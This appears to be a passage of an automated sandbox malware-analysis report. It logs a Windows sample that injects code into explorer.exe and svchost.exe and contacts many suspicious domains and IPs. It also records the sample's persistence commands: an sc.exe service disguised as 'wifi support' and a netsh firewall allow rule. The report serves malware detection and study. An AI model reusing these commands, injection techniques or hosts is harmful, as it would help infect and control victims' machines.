                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: 18_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exeCode function: 31_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 194.87.235.183 443
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 40.93.207.1 25
                      Source: C:\Windows\explorer.exeDomain query: bitly.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: patmushta.info
                      Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                      Source: C:\Windows\explorer.exeNetwork Connect: 188.166.28.199 80
                      Source: C:\Windows\explorer.exeDomain query: amogohuigotuli.at
                      Source: C:\Windows\explorer.exeDomain query: host-data-coin-11.com
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.7.214.171 144
                      Source: C:\Windows\explorer.exeDomain query: f0616068.xsph.ru
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.186.142.166 80
                      Source: C:\Windows\explorer.exeDomain query: privacytools-foryou-777.com
                      Source: C:\Windows\explorer.exeDomain query: unic11m.top
                      Source: C:\Windows\explorer.exeDomain query: vk.com
                      Source: C:\Windows\explorer.exeDomain query: www.mediafire.com
                      Source: C:\Windows\explorer.exeDomain query: natribu.org
                      Source: C:\Windows\explorer.exeDomain query: unicupload.top
                      Source: C:\Windows\explorer.exeDomain query: srtuiyhuali.at
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.233.81.115 187
                      Source: C:\Windows\explorer.exeDomain query: fufuiloirtu.com
                      Source: C:\Windows\explorer.exeDomain query: bit.ly
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: microsoft-com.mail.protection.outlook.com
                      Source: C:\Windows\explorer.exeDomain query: goo.su
                      Source: C:\Windows\explorer.exeDomain query: transfer.sh
                      Source: C:\Windows\explorer.exeDomain query: data-host-coin-8.com
                      Benign windows process drops PE filesShow sources
                      Source: C:\Windows\explorer.exeFile created: haifbcd.3.drJump to dropped file
                      Maps a DLL or memory area into another processShow sources
                      Source: C:\Users\user\Desktop\nkINykHreE.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\Desktop\nkINykHreE.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Source: C:\Users\user\AppData\Roaming\haifbcdSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\AppData\Roaming\haifbcdSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Source: C:\Users\user\AppData\Roaming\scifbcdSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\AppData\Roaming\scifbcdSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Allocates memory in foreign processesShow sources
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 2BB0000 protect: page execute and read and write
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\Desktop\nkINykHreE.exeMemory written: C:\Users\user\Desktop\nkINykHreE.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\haifbcdMemory written: C:\Users\user\AppData\Roaming\haifbcd base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Local\Temp\115B.exeMemory written: C:\Users\user\AppData\Local\Temp\115B.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeMemory written: C:\Users\user\AppData\Local\Temp\CBA.exe base: 400000 value starts with: 4D5A
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2BB0000 value starts with: 4D5A
                      Contains functionality to inject code into remote processesShow sources
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 0_2_00540110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                      Creates a thread in another existing process (thread injection)Show sources
                      Source: C:\Users\user\Desktop\nkINykHreE.exeThread created: C:\Windows\explorer.exe EIP: 3A61930
                      Source: C:\Users\user\AppData\Roaming\haifbcdThread created: unknown EIP: 5DD1930
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeThread created: unknown EIP: 6DB1A40
                      Source: C:\Users\user\AppData\Roaming\scifbcdThread created: unknown EIP: 7701A40
                      Writes to foreign memory regionsShow sources
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2BB0000
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2C71008
                      .NET source code references suspicious native API functionsShow sources
                      Source: CBA.exe.3.dr, lennahCtneilCIledoMecivreSmetsyS22062.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: CBA.exe.3.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 19.0.CBA.exe.cb0000.1.unpack, lennahCtneilCIledoMecivreSmetsyS22062.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 19.0.CBA.exe.cb0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 19.0.CBA.exe.cb0000.0.unpack, lennahCtneilCIledoMecivreSmetsyS22062.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 19.0.CBA.exe.cb0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 19.0.CBA.exe.cb0000.3.unpack, lennahCtneilCIledoMecivreSmetsyS22062.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 19.0.CBA.exe.cb0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 19.0.CBA.exe.cb0000.2.unpack, lennahCtneilCIledoMecivreSmetsyS22062.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 19.0.CBA.exe.cb0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 19.2.CBA.exe.cb0000.0.unpack, lennahCtneilCIledoMecivreSmetsyS22062.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 19.2.CBA.exe.cb0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 33.0.CBA.exe.f90000.2.unpack, lennahCtneilCIledoMecivreSmetsyS22062.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 33.0.CBA.exe.f90000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 33.0.CBA.exe.400000.4.unpack, NativeHelper.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 33.2.CBA.exe.400000.0.unpack, NativeHelper.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 33.0.CBA.exe.f90000.7.unpack, lennahCtneilCIledoMecivreSmetsyS22062.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 33.0.CBA.exe.f90000.7.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 33.0.CBA.exe.400000.12.unpack, NativeHelper.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 33.0.CBA.exe.400000.8.unpack, NativeHelper.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: C:\Users\user\Desktop\nkINykHreE.exeProcess created: C:\Users\user\Desktop\nkINykHreE.exe "C:\Users\user\Desktop\nkINykHreE.exe"
                      Source: C:\Users\user\AppData\Roaming\haifbcdProcess created: C:\Users\user\AppData\Roaming\haifbcd C:\Users\user\AppData\Roaming\haifbcd
                      Source: C:\Users\user\AppData\Local\Temp\115B.exeProcess created: C:\Users\user\AppData\Local\Temp\115B.exe C:\Users\user\AppData\Local\Temp\115B.exe
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\dbgxuqbr\
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\sdiimdop.exe" C:\Windows\SysWOW64\dbgxuqbr\
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create dbgxuqbr binPath= "C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe /d\"C:\Users\user\AppData\Local\Temp\18D.exe\"" type= own start= auto DisplayName= "wifi support
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description dbgxuqbr "wifi internet conection
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start dbgxuqbr
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess created: C:\Users\user\AppData\Local\Temp\CBA.exe C:\Users\user\AppData\Local\Temp\CBA.exe
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: 18_2_00406EDD AllocateAndInitializeSid,CheckTokenMembership,FreeSid,
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: 18_2_00407809 CreateThread,GetUserNameA,LookupAccountNameA,GetLengthSid,GetFileSecurityA,GetSecurityDescriptorOwner,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityA,LocalFree,GetSecurityDescriptorDacl,GetAce,EqualSid,DeleteAce,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityA,LocalFree,
                      Source: explorer.exe, 00000003.00000000.285107992.0000000005EA0000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.255543358.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.260756082.00000000089FF000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.281261190.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.267419083.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.275109089.00000000089FF000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.290404314.00000000089FF000.00000004.00000001.sdmp, 4187.exe, 0000002A.00000002.569545258.0000000001210000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 00000003.00000000.255543358.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.281261190.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.267419083.0000000001640000.00000002.00020000.sdmp, 4187.exe, 0000002A.00000002.569545258.0000000001210000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 00000003.00000000.255543358.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.281261190.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.267419083.0000000001640000.00000002.00020000.sdmp, 4187.exe, 0000002A.00000002.569545258.0000000001210000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
                      Source: explorer.exe, 00000003.00000000.255386950.0000000001128000.00000004.00000020.sdmp, explorer.exe, 00000003.00000000.266495197.0000000001128000.00000004.00000020.sdmp, explorer.exe, 00000003.00000000.280909928.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
                      Source: explorer.exe, 00000003.00000000.255543358.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.281261190.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.267419083.0000000001640000.00000002.00020000.sdmp, 4187.exe, 0000002A.00000002.569545258.0000000001210000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
                      Source: explorer.exe, 00000003.00000000.255543358.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.281261190.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000003.00000000.267419083.0000000001640000.00000002.00020000.sdmp, 4187.exe, 0000002A.00000002.569545258.0000000001210000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: _GetLcidFromDefault,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,_GetLcidFromDefault,_ProcessCodePage,IsValidCodePage,IsValidLocale,_wcscpy_s,__invoke_watson_if_error,GetLocaleInfoA,GetLocaleInfoA,__itow_s,
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: _LcidFromHexString,GetLocaleInfoA,__stricmp,GetLocaleInfoA,__stricmp,__strnicmp,_strlen,_TestDefaultCountry,GetLocaleInfoA,__stricmp,_strlen,_TestDefaultLanguage,__stricmp,_TestDefaultLanguage,
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: GetLocaleInfoA,GetACP,GetLocaleInfoA,
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: GetLocaleInfoW,
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: _LcidFromHexString,GetLocaleInfoA,__stricmp,_TestDefaultLanguage,__stricmp,_TestDefaultLanguage,
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: __crtGetLocaleInfoW_stat,_LocaleUpdate::~_LocaleUpdate,
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoA,GetLocaleInfoW,_malloc,__MarkAllocaS,GetLocaleInfoW,WideCharToMultiByte,WideCharToMultiByte,__freea,
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: __crtGetLocaleInfoA_stat,_LocaleUpdate::~_LocaleUpdate,
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: ___crtGetLocaleInfoW,GetLastError,___crtGetLocaleInfoW,___crtGetLocaleInfoW,_strncpy_s,__invoke_watson_if_error,___crtGetLocaleInfoW,
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: GetLocaleInfoA,
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: _LcidFromHexString,GetLocaleInfoA,__stricmp,_TestDefaultCountry,
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: ___getlocaleinfo,GetCPInfo,___crtLCMapStringW,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_fix_grouping,InterlockedDecrement,InterlockedDecrement,
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: _strlen,EnumSystemLocalesA,
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_fix_grouping,InterlockedDecrement,InterlockedDecrement,
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCode function: __nh_malloc_dbg,__malloc_dbg,__malloc_dbg,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_fix_grouping,
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCode function: ___getlocaleinfo,__malloc_dbg,__nh_malloc_dbg,__nh_malloc_dbg,__nh_malloc_dbg,__nh_malloc_dbg,___crtLCMapStringW,___crtLCMapStringA,___crtLCMapStringA,
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCode function: __crtGetLocaleInfoW_stat,_LocaleUpdate::~_LocaleUpdate,
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCode function: __nh_malloc_dbg,__malloc_dbg,__malloc_dbg,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_fix_grouping,
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCode function: __crtGetLocaleInfoA_stat,_LocaleUpdate::~_LocaleUpdate,
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCode function: ___crtGetLocaleInfoW,___crtGetLocaleInfoW,__nh_malloc_dbg,___crtGetLocaleInfoW,__nh_malloc_dbg,_strncpy_s,__invoke_watson_if_error,___crtGetLocaleInfoW,_isdigit,
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: ___getlocaleinfo,__malloc_dbg,__nh_malloc_dbg,__nh_malloc_dbg,__nh_malloc_dbg,__nh_malloc_dbg,___crtLCMapStringW,___crtLCMapStringA,___crtLCMapStringA,
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: __nh_malloc_dbg,__malloc_dbg,__malloc_dbg,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_fix_grouping,
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: __crtGetLocaleInfoW_stat,_LocaleUpdate::~_LocaleUpdate,
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: __crtGetLocaleInfoA_stat,_LocaleUpdate::~_LocaleUpdate,
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: ___crtGetLocaleInfoW,___crtGetLocaleInfoW,__nh_malloc_dbg,___crtGetLocaleInfoW,__nh_malloc_dbg,_strncpy_s,__invoke_watson_if_error,___crtGetLocaleInfoW,
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: __nh_malloc_dbg,__malloc_dbg,__malloc_dbg,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_fix_grouping,
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exeCode function: ___getlocaleinfo,__malloc_dbg,__nh_malloc_dbg,__nh_malloc_dbg,__nh_malloc_dbg,__nh_malloc_dbg,___crtLCMapStringW,___crtLCMapStringA,___crtLCMapStringA,
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exeCode function: __nh_malloc_dbg,__malloc_dbg,__malloc_dbg,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_fix_grouping,
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exeCode function: __crtGetLocaleInfoW_stat,_LocaleUpdate::~_LocaleUpdate,
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exeCode function: __crtGetLocaleInfoA_stat,_LocaleUpdate::~_LocaleUpdate,
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exeCode function: ___crtGetLocaleInfoW,___crtGetLocaleInfoW,__nh_malloc_dbg,___crtGetLocaleInfoW,__nh_malloc_dbg,_strncpy_s,__invoke_watson_if_error,___crtGetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exeCode function: __nh_malloc_dbg,__malloc_dbg,__malloc_dbg,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_fix_grouping,
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
